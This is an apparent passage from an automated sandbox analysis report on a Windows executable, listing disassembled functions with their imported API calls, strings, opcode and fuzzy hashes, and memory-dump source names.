Opcode ID: f015d3443df42c3d85062f3703b6644e6ba89887f2ce05a615ef77e3c323f47e
Instruction ID: d07d2cc3bb0a99fa76ee8cd84f9234b5efd7a1bf2a5af1bd70063ca1bffe65cf
Opcode Fuzzy Hash: f015d3443df42c3d85062f3703b6644e6ba89887f2ce05a615ef77e3c323f47e
Instruction Fuzzy Hash: BEE0E53A024101BBDB012FE5EC0C95ABF39FF4A722B104620F72592470CF32A560DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B12EFA, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B12F67
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00B12F83
DeleteMenu.USER32(?,00000007,00000000), ref: 00B12FC9
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00B77890,00000000), ref: 00B13012

Strings

0, xrefs: 00B12F5C

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: a794b3cedd9e3fecffe4f2bca159c6f49a11c38ffc25ccac30663554931e547b
Instruction ID: e6d692e17acadabbf05184c7d888fc9da0cbd6cdc50435405284f054969cd33d
Opcode Fuzzy Hash: a794b3cedd9e3fecffe4f2bca159c6f49a11c38ffc25ccac30663554931e547b
Instruction Fuzzy Hash: 9241C3312083419FD720DF24C888B9ABBE4EF89710F504A5EF56597291EB70EA45CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00B09A48, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AC1A36: _memmove.LIBCMT ref: 00AC1A77

Part of subcall function 00B0B79A: GetClassNameW.USER32 ref: 00B0B7BD

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00B09ACC
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00B09ADF
SendMessageW.USER32(?,00000189,?,00000000), ref: 00B09B0F

Part of subcall function 00AC1821: _memmove.LIBCMT ref: 00AC185B

Strings

ListBox, xrefs: 00B09A8B
ComboBox, xrefs: 00B09A56

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 516522f93b501dc9b717437f73f4c2dc97adef5b3e65c315b7d1cd91cae68da1
Instruction ID: f9c57c58b43d0ad0203893469e87d5ad53ee1d0b90f15563796f4a322900ad53
Opcode Fuzzy Hash: 516522f93b501dc9b717437f73f4c2dc97adef5b3e65c315b7d1cd91cae68da1
Instruction Fuzzy Hash: 13213776A051047EDF14EBA4DC85DFFBBB8EF52360F114159F826A32E2DB344D069620

Uniqueness

Uniqueness Score: -1.00%

Function 00B095D7, Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32 ref: 00B095E8
PostMessageW.USER32(?,00000201,00000001), ref: 00B09692
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00B0969A
PostMessageW.USER32(?,00000202,00000000), ref: 00B096A8
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00B096B0

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: f029a5d91f12ad4909e1e4093d23c95950168267718b5d38d7eff98d003b6916
Instruction ID: ffe5abcb3437d6fbb6cddd4c5f41eba592801a8bf4d140cb5693fd7b5d7731c4
Opcode Fuzzy Hash: f029a5d91f12ad4909e1e4093d23c95950168267718b5d38d7eff98d003b6916
Instruction Fuzzy Hash: A331FD71900219EFDF10CFA8D94CAAE3FB5FB45315F104268FA25AB2D1C7B19A20CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00AE5312, Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00AE531E

Part of subcall function 00AD593C: __FF_MSGBANNER.LIBCMT ref: 00AD5953
Part of subcall function 00AD593C: __NMSG_WRITE.LIBCMT ref: 00AD595A
Part of subcall function 00AD593C: RtlAllocateHeap.NTDLL(00C80000,00000000,00000001,?,00000004,?,?,00AD1003,?), ref: 00AD597F

_free.LIBCMT ref: 00AE5331

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: fc2035853b7dd8a7ecb03b0e209872ec72b1f8f64573c47a6ad1a5f304eecbe3
Instruction ID: b1d2bc3446a1fbf40871608b166d7877a91614a0a64d3bd09a86d772ccc9c67e
Opcode Fuzzy Hash: fc2035853b7dd8a7ecb03b0e209872ec72b1f8f64573c47a6ad1a5f304eecbe3
Instruction Fuzzy Hash: D4112732C05A47AFCB243F71FC1165A3B94AF153A4F200527F9599F2D0CEB489408790

Uniqueness

Uniqueness Score: -1.00%

Function 00AB16CF, Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AB1729
SelectObject.GDI32(?,00000000), ref: 00AB1738
BeginPath.GDI32(?), ref: 00AB174F
SelectObject.GDI32(?,00000000), ref: 00AB1778

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: ed40ba32dd1cf87ad468972375b3721054a9fa0c5fa5b43a82d69b23574288fe
Instruction ID: 527c26dc15e91cf35b69deecd0a323022fb35122e075334763ec982661590c41
Opcode Fuzzy Hash: ed40ba32dd1cf87ad468972375b3721054a9fa0c5fa5b43a82d69b23574288fe
Instruction Fuzzy Hash: F8219030814208EBDB109F66DD58BA97BA8FB01311F544226F91A972A2DF7099D1CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00B07D07, Relevance: 7.6, APIs: 5, Instructions: 60stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B087E4: RaiseException.KERNEL32(8007000E,?,00000000,00000000,?,00B07D27,-C0000018,00000001,?,00B07C62,80070057,?,?,?,00B08073), ref: 00B087F1

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B07C62,80070057,?,?,?,00B08073), ref: 00B07D45
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B07C62,80070057,?,?), ref: 00B07D60
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B07C62,80070057,?,?), ref: 00B07D6E
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B07C62,80070057,?), ref: 00B07D7E
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B07C62,80070057,?,?), ref: 00B07D8A

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: From$Prog$ExceptionFreeRaiseStringTasklstrcmpi
String ID:
API String ID: 450394209-0
Opcode ID: 6f1ee978a72d284624e3ab789ec6c5baed0bb58969f60e769c64f9e307660dd6
Instruction ID: 4c678aad73c357ba5e17a2d2ead2333fb66d1fc50dc39f1dc01c91667f77684c
Opcode Fuzzy Hash: 6f1ee978a72d284624e3ab789ec6c5baed0bb58969f60e769c64f9e307660dd6
Instruction Fuzzy Hash: 3811E0B6A10209BBDB105F64DD04BA9BFEDFF44351F108164B908D7150DF75EE40C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 00B08E20, Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B08E3C
GetLastError.KERNEL32(?,00B08900,?,?,?), ref: 00B08E46
GetProcessHeap.KERNEL32(00000008,?,?,00B08900,?,?,?), ref: 00B08E55
HeapAlloc.KERNEL32(00000000,?,00B08900,?,?,?), ref: 00B08E5C
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B08E73

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 1f3b4b0b179b292031e03fea379be5e00ae913abc51dbca2e297e0735c8bd197
Instruction ID: f3b584353c608b1d37e8876c6c379df13b8fff94591843c11b5ad36bccd3db25
Opcode Fuzzy Hash: 1f3b4b0b179b292031e03fea379be5e00ae913abc51dbca2e297e0735c8bd197
Instruction Fuzzy Hash: A0016D74210204BFDB205FA5EC48D6B7FADFF8A754B100569FA89C3260DE319E11CA60

Uniqueness

Uniqueness Score: -1.00%

Function 00B157FF, Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B1581B
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B15829
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B15831
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B1583B
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B15877

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 0514c2f22abfa82a46f4ed01460b62c2407216878f6a74e488bac3ae5a245c7e
Instruction ID: b1e27900be9180f40c4c1b1a196338350399d233e9f93de8e2762c4553a1db6b
Opcode Fuzzy Hash: 0514c2f22abfa82a46f4ed01460b62c2407216878f6a74e488bac3ae5a245c7e
Instruction Fuzzy Hash: 65015735C11A1DDBCF20AFE5E888AEDBBB8FB49711F804196E601B3140CF309690CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B08CC7, Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B08CDE
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B08CE8
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B08CF7
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B08CFE
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B08D14

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: baf26d33a38c35d39d6cc0e78067ed6451621ef5375836fd6a3ecf7e6d743e74
Instruction ID: ca42d2b2352e38e9f268332bcb3764c8756c586391b1cea6f1d3a510c5b71940
Opcode Fuzzy Hash: baf26d33a38c35d39d6cc0e78067ed6451621ef5375836fd6a3ecf7e6d743e74
Instruction Fuzzy Hash: EEF0AF38210208BFEF211FA49C88E673FACFF5A754B104629FA84C7190CE709E00DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B08D28, Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B08D3F
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B08D49
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B08D58
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B08D5F
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B08D75

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: b5311bcbb54fc215a2cd15d6618e3f167c92ec97c959f70a42551b4de7a7f50e
Instruction ID: ccde423ff324993f3a1b338149f349e0a80f126ee0efc77c2505fc53cf6f5d94
Opcode Fuzzy Hash: b5311bcbb54fc215a2cd15d6618e3f167c92ec97c959f70a42551b4de7a7f50e
Instruction Fuzzy Hash: 15F08C34220204AFEB211FA8EC88F673FACFF4A754F040229FA8483190CE709E00DA60

Uniqueness

Uniqueness Score: -1.00%

Function 00AB178C, Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00AB179B
StrokeAndFillPath.GDI32(?,?,00AEBBC9,00000000,?), ref: 00AB17B7
SelectObject.GDI32(?,00000000), ref: 00AB17CA
DeleteObject.GDI32 ref: 00AB17DD
StrokePath.GDI32(?), ref: 00AB17F8

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 18224e03a9bd9f892f22b12ac9d7b76136e8f5133d947f18b23e8782c6c5d9ce
Instruction ID: 719af258531fd0f15459a5b1d12cecd46efbed5acacbe873fd64588411369a81
Opcode Fuzzy Hash: 18224e03a9bd9f892f22b12ac9d7b76136e8f5133d947f18b23e8782c6c5d9ce
Instruction Fuzzy Hash: 72F0CD30058248EBDB159F16EC5CB593BA4B701326F548214F92E972F2CF3146D5DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00ABE3C6, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00AD0FE6: _malloc.LIBCMT ref: 00AD0FFE

Part of subcall function 00AD0FE6: std::exception::exception.LIBCMT ref: 00AD101C
Part of subcall function 00AD0FE6: __CxxThrowException@8.LIBCMT ref: 00AD1031

Part of subcall function 00AC1A36: _memmove.LIBCMT ref: 00AC1A77

Part of subcall function 00AC1680: _memmove.LIBCMT ref: 00AC16DB

__swprintf.LIBCMT ref: 00ABE598

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00ABE431

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove$Exception@8Throw__swprintf_mallocstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 865004172-557222456
Opcode ID: 59572abefbf073eaa55a9d53bad8a1a907d83d23f5c96f93a038980203c80afa
Instruction ID: 05db014f1b8a729b8b7b4303e9c3e519744a6712577848d5c03338d3f6830827
Opcode Fuzzy Hash: 59572abefbf073eaa55a9d53bad8a1a907d83d23f5c96f93a038980203c80afa
Instruction Fuzzy Hash: CF9190716082059FC724EF64C995DBEB7F8EF96300F45091DF592972A2EB20ED44CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00AD0654, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

#, xrefs: 00AD0699
+, xrefs: 00AD0690

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: a63ae67c4d699b7b8313f19ab9237b8fb575e7035697c192dd4b72182325cd32
Instruction ID: 96b16d7f5bb62b6edb94c0d94a137fdc28db3146e1d97af948381eb839693f27
Opcode Fuzzy Hash: a63ae67c4d699b7b8313f19ab9237b8fb575e7035697c192dd4b72182325cd32
Instruction Fuzzy Hash: AD5101759003568FDB15EF28C884AFA7BA4EF56310F148096FC929B2D0D734AD62CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00ACCF0C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00ACCFC2
_memmove.LIBCMT ref: 00ACD060
_memset.LIBCMT ref: 00ACD084

Strings

ERCP, xrefs: 00ACCF2D

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: a0e70f403f6a903b47ca49101de57fd9779e9b0c1674db2ac3b3efc394c2aca7
Instruction ID: 29fabd768b0b7e9bff8129fd1c7a87574edee12d3fca2972a3b1aa41783b9c20
Opcode Fuzzy Hash: a0e70f403f6a903b47ca49101de57fd9779e9b0c1674db2ac3b3efc394c2aca7
Instruction Fuzzy Hash: 6651A471900709DBDB24CF68C881BAABBF4EF04315F1585BEE54BDB291E7359585CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00AC4B77, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00AC4B44,?,00AC49D4,?,?,00AC27AF,?,00000001), ref: 00AC4B85
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00AC4B97

Strings

kernel32.dll, xrefs: 00AC4B80
Wow64DisableWow64FsRedirection, xrefs: 00AC4B91

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 725a0e2e565d7348d800cb23c89dc55f844b290bb4d1418ff2d9a42e595f1dd0
Instruction ID: 96705684bd339a226e1dd2732c6b3549cf19ede4c46feb5c90cd938b439f4a52
Opcode Fuzzy Hash: 725a0e2e565d7348d800cb23c89dc55f844b290bb4d1418ff2d9a42e595f1dd0
Instruction Fuzzy Hash: A4D017B45307528FD720AF35DC28F0676F4AF09351F12886EE586F2660EAB4E880DA14

Uniqueness

Uniqueness Score: -1.00%

Function 00AC55F0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00AC5E3D), ref: 00AC55FE
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00AC5610

Strings

kernel32.dll, xrefs: 00AC55F9
GetNativeSystemInfo, xrefs: 00AC560A

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 44390b2346a6fccc9d66af033407916e10fd12f423145c1e685b46463ccd334d
Instruction ID: 02957330e27ee6e6b7c57cad8c75f0ab4f54defcdc326aed691f5913bdf6b800
Opcode Fuzzy Hash: 44390b2346a6fccc9d66af033407916e10fd12f423145c1e685b46463ccd334d
Instruction Fuzzy Hash: 38D01278D307128FE7206F35C80871776E4AF05355B15886DE586D2161DA70D5C0DA50

Uniqueness

Uniqueness Score: -1.00%

Function 00B07D9B, Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dd63d2207480fc4637451467a9a01c0c25fc8a37dbff2c7b3afce5c2d5b2f1e
Instruction ID: d436acde2375c5e1fd3d5131445c7d1d1334471b177d10f7ed4a283f63b0ee35
Opcode Fuzzy Hash: 1dd63d2207480fc4637451467a9a01c0c25fc8a37dbff2c7b3afce5c2d5b2f1e
Instruction Fuzzy Hash: 2FC13B75A04216EFCB14CF94C884AAAFBF5FF48714B2585D8E845DB291DB31EE81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B0814E, Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00B43C4C,?), ref: 00B08308
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00B43C4C,?), ref: 00B08320
CLSIDFromProgID.OLE32(?,?,00000000,00B40988,000000FF,?,00000000,00000800,00000000,?,00B43C4C,?), ref: 00B08345
_memcmp.LIBCMT ref: 00B08366

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 34625f9634832fe3d7505d8a2505b0430b38382bc20fb4215d0b4e57f070c73d
Instruction ID: 7e4c93c66149e3fd787b256a2ea4c212be18d494c73f609a70798305f6469eca
Opcode Fuzzy Hash: 34625f9634832fe3d7505d8a2505b0430b38382bc20fb4215d0b4e57f070c73d
Instruction Fuzzy Hash: 19810975A00109EFCB04DF94C984EEEBBB9FF89315B244598F546AB250DB71AE06CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B0749B, Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B074AC
SysAllocString.OLEAUT32(00000000), ref: 00B07555
VariantCopy.OLEAUT32 ref: 00B07584
